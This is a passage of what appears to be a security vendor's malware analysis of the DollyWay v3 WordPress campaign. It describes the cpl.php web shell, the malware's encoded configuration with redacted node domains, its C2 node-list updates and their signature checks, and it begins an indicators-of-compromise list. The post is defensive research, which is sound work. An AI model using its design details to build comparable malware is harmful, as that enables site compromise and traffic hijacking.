fast_worker cookie: \u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"wordpress update utiltity in dollyway malware campaign\" loading=\"lazy\" width=\"1150\" height=\"506\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-6.png?size=3840x0\"\/><\/figure>\n<\/div>\n<h5 id=\"h-cpl-php-dollyway-web-shell-nbsp\">Cpl.php: DollyWay web shell\u00a0<\/h5>\n<p>The DollyWay v3 malware itself has a function to create <strong>cpl.php<\/strong> files, download their PHP code from an external URL, then open that file in a browser.\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXeeodvkCAdNn6hv-yE7BnjUCc2LJHp_txK1AvpdfssisFzmMxnjPHzslXtL0bvad_Hi8fx-XZjn-UpZc0yliJXr0caMd0u8bAvjImsRafCg9UsZNhOe6XbzZaY8J6RcOj8E28km?key=Cnvz29y2lM3geWKH1Pc8pydZ\" alt=\"Dollyway web shell example\" width=\"450px\" loading=\"lazy\"\/><\/figure>\n<\/div>\n<p>We also find backdoors that drop <strong>cpl.php<\/strong> files. They are heavily encrypted and can be several hundred Kilobytes in size. When partially decrypted we see the use of the same DollyDecode algorithm as in the main malware. In this case, the missing decoding parameter is retrieved from the cookie \u201c<strong>nd_p<\/strong>\u201d. If this parameter is present, the file also injects a JavaScript from <strong>\/\/127.0.0.1\/d_p.php<\/strong> from the attacker&#8217;s own computer, which suggests interactive nature of the script.\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"missing decoding parameter is retrieved from the cookie \u201cnd_p\u201d\" loading=\"lazy\" width=\"1220\" height=\"662\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-13.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>The size of code and the fact that attackers want to load it in a browser suggests that this backdoor is some sort of web shell. \u00a0<\/p>\n<p>This hypothesis is backed by <a data-eid=\"publishing.library.dollyway-world-domination.external.link.click\" data-wpel-link=\"external\" rel=\"noreferrer noopener nofollow\" target=\"_blank\" href=\"https:\/\/blog.sucuri.net\/2020\/10\/r_evil-wordpress-hacktool-malicious-javascript-injections.html\">the analysis of the cpl.php file<\/a> used in early iterations of this malware back in 2020, when it was possible to easily decrypt it. Let\u2019s just remember that <strong>cpl.php<\/strong> was a custom web shell. It has many generic web shell functions such as \u201c<strong>file manager<\/strong>\u201d, that can browse, edit, delete and create files, change their permissions, execute arbitrary PHP code. However, a significant share of its functionality is specific to this particular malware campaign.\u00a0<\/p>\n<p>For example, it could:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>Inject the DollyWay malware into websites (back in 2020, they created a malicious version of the Hello Dolly plugin <strong>\/hello\/hello.php<\/strong>), \u00a0<\/li>\n<li>Remove DollyWay malware (all malicious WordPress options, all backdoors, maintenance and files)\u00a0<\/li>\n<li>Install, update, debug WordPress\u00a0<\/li>\n<li>Remove malware from WordPress \u00a0<\/li>\n<\/ul>\n<p>Yes, the attackers are so interested in every compromised website so that they can go a long way to make sure it works properly and no other malware steals traffic from them or attracts unneeded site owner\u2019s attention to security problems that may result in removal of their malware along with other malware that caused the initial scrutiny.\u00a0<\/p>\n<p>Back in 2020, malware operators already had over 150 complex signatures to detect and remove various types of malware, including signatures for massive third-party campaigns such as Balada Injector:\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"signatures for massive third-party campaigns such as Balada Injector\" loading=\"lazy\" width=\"1170\" height=\"1478\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-14.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>We can only speculate that with thousands of infected sites, the maintenance features of the <strong>cpl.php <\/strong>script have not been used for every site, otherwise it would require too much time or dozens of operators working around the clock. Most likely such features are only used for the most important sites (e.g. high traffic or TDS node) and for sites with obvious problems.\u00a0<\/p>\n<h3 id=\"h-malware-settings-and-configuration-management-nbsp\">Malware settings and configuration management\u00a0<\/h3>\n<p>The malware maintains its configuration through encoded WordPress options, storing settings in a sophisticated but discoverable format. Each infected site maintains a unique identifier and configuration set. Settings are stored in the<strong> wp_option<\/strong> table in the option with the <strong>hex32<\/strong> name (unique for each site) as base64-encoded serialized data:\u00a0<\/p>\n<div>\n<pre class=\"code_syntax\" style=\"color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\">a:4:<span style=\"color:#b060b0; \">{<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202fs<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">5<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"nodes\"<\/span><span style=\"color:#b060b0; \">;<\/span>a<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">14<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#b060b0; \">{<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">0<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">32<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node1>\/wp-content\/\"<\/node1><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">1<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">37<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node2>\/wp-content\/\"<\/node2><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">2<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">39<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node3>\/wp-content\/\"<\/node3><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">3<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">29<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node4>\/wp-content\/\"<\/node4><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">4<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">24<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node5>\/wp-content\/\"<\/node5><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">5<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">46<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node6>\/wp-content\/\"<\/node6><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">6<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">45<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node7>\/wordpress\/wp-content\/\"<\/node7><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">7<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">27<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node8>\/wp-content\/\"<\/node8><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">8<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">36<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node9>\/wp-content\/\"<\/node9><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">9<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">22<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node10>\/wp-content\/\"<\/node10><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">10<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">32<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node11>\/wp-content\/\"<\/node11><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">11<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">29<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node12>\/wp-content\/\"<\/node12><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">12<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">32<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node13>\/wp-content\/\"<\/node13><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f\u202f\u202fi<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">13<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">35<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"\/\/<node1>\/wp-content\/\"<\/node1><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202f<span style=\"color:#b060b0; \">}<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202fs<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">15<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"dolly_last_cron\"<\/span><span style=\"color:#b060b0; \">;<\/span>i<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">0<\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202fs<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">14<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"dolly_category\"<\/span><span style=\"color:#b060b0; \">;<\/span>i<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">0<\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\">\u202f\u202fs<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">10<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"dolly_name\"<\/span><span style=\"color:#b060b0; \">;<\/span>s<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#008c00; \">32<\/span><span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#00c4c4; \">\"<hex32>\"<\/hex32><\/span><span style=\"color:#b060b0; \">;<\/span> <\/span>\n<span class=\"line_wrapper\"><span style=\"color:#b060b0; \">}<\/span> <\/span><\/pre>\n<\/div>\n<p>The data consists of a list of (currently 14) nodes. The node URLs belong to infected third-party sites that serve as autonomous distributed C2\/TDS. In the above example, we\u2019ve replaced the domain names of the infected sites with <noden>.\u00a0<\/noden><\/p>\n<p>The nodes are used to retrieve the most current list of nodes and inject redirect scripts to infected pages.\u00a0<br \/>Other settings include:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li><strong>dolly_last_cron<\/strong> &#8211; timestamp of the last time the nodes were updated (only used if WordPress cron service is disabled)\u00a0<\/li>\n<li><strong>dolly_category<\/strong> &#8211; category of VexTrio links to use\u00a0<\/li>\n<li><strong>dolly_name<\/strong> &#8211; unique 32-character long hexadecimal string <hex32>\u00a0<\/hex32><\/li>\n<\/ul>\n<h3 id=\"h-command-amp-control-infrastructure-nbsp\">Command &amp; Control infrastructure\u00a0<\/h3>\n<h4 id=\"h-daily-node-list-update-nbsp\">Daily node list update\u00a0<\/h4>\n<p>The node list is scheduled to be updated once a day using either WordPress cron jobs or directly through the malware when someone loads an infected web page.\u00a0<\/p>\n<p>To update the nodes, an infected site makes server-side requests to each of the current nodes until it receives a valid response from any of them. The node update request URLs look like <strong>http:\/\/<noden>\/wp-content\/data.txt<\/noden><\/strong>.\u00a0<br \/>\u00a0<br \/>A typical response looks like this:\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"typical response from dollyway server-side\" loading=\"lazy\" width=\"1252\" height=\"432\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-16.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>Where the first line is a cryptographic signature and the second line is a base64-encoded serialized data with new nodes and category codes.\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"cryptographic signature and base-64 encoded serialized data\" loading=\"lazy\" width=\"850\" height=\"720\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-15.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>The nodes array is saved into malware settings while \u201csubs\u201d are ignored by DollyWay v3. Subs is a legacy from DollyWay v2 that used to pass the \u201csubs\u201d values to the TDS URLs.\u00a0<\/p>\n<p>While DollyWay v3 is the most current version of this malware, there are still many infected sites that use the older DollyWay v2 malware. And all the nodes work for both v2 and v3 malware, which explains why you can see data that is no longer used still being passed in the update responses.\u00a0<\/p>\n<h4 id=\"h-cryptographic-signatures-verify-data-integrity-nbsp\">Cryptographic signatures verify data integrity\u00a0<\/h4>\n<p>The update data is easy to decode, however the malware doesn\u2019t immediately trust it. To apply the update, it should be correctly signed with a private key that only the malware operators have. Additionally, to ensure that the data wasn\u2019t tampered with, the update function uses the public key and the <strong>openssl_verify<\/strong> function to verify the signature provided as the first line of the update data.\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"cryptographic signatures verify data integrity dollyway malware\" loading=\"lazy\" width=\"1170\" height=\"412\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-10.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>This is a natural behavior when they run their C2 centers on compromised sites. This means that at any moment the malware can be detected, removed, or modified. So, they need to guarantee the integrity of the data it tries to pass to infected sites.\u00a0<\/p>\n<h2 id=\"h-conclusion-nbsp\">Conclusion\u00a0<\/h2>\n<p>While this analysis provides insight into DollyWay\u2019s current operations, it represents only the latest chapter in an eight-year evolution of increasingly sophisticated website compromise campaigns. The attention to detail, persistent infrastructure, and unusual focus on maintaining compromised sites points to a highly organized operation that has learned and adapted over nearly a decade.\u00a0\u00a0<\/p>\n<p>In our follow-up analysis, we\u2019ll explore the C2\/TDS nodes used by DollyWay malware along with how this campaign evolved from its earliest iterations as \u201cMaster134\u201d in 2016 through multiple variants and infrastructure changes. We\u2019ll examine how the operators shift to and from ad network redirects, tech support scams and binary fake browser updates. Stay tuned as we unpack the complete timeline in our next deep-dive.\u00a0\u00a0<\/p>\n<h2 id=\"h-indicators-of-compromise-nbsp\">Indicators of compromise\u00a0<\/h2>\n<p><strong>TDS node script URL pattern:\u00a0<\/strong><\/p>\n<div>\n<pre class=\"code_syntax\" style=\"white-space:pre-wrap;color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\">https<span style=\"color:#d2cd86; \">:<\/span><span style=\"color:#d2cd86; \">\/<\/span><span style=\"color:#d2cd86; \">\/<\/span><span style=\"color:#d2cd86; \">compromised<span style=\"color:#d2cd86; \">-<\/span>site<span style=\"color:#d2cd86; \">&gt;<\/span><span style=\"color:#d2cd86; \">\/<\/span>wp<span style=\"color:#d2cd86; \">-<\/span>content<span style=\"color:#d2cd86; \">\/<\/span>counts<span style=\"color:#00a800; \">.<\/span>php?cat<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#d2cd86; \">[<\/span><span style=\"color:#00a800; \">0<\/span>|<span style=\"color:#00a800; \">1<\/span><span style=\"color:#d2cd86; \">]<\/span><span style=\"color:#d2cd86; \">&amp;<\/span>t<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#d2cd86; \">encrypted<span style=\"color:#d2cd86; \">-<\/span>ref<span style=\"color:#d2cd86; \">-<\/span>domain<span style=\"color:#d2cd86; \">&gt;<\/span> 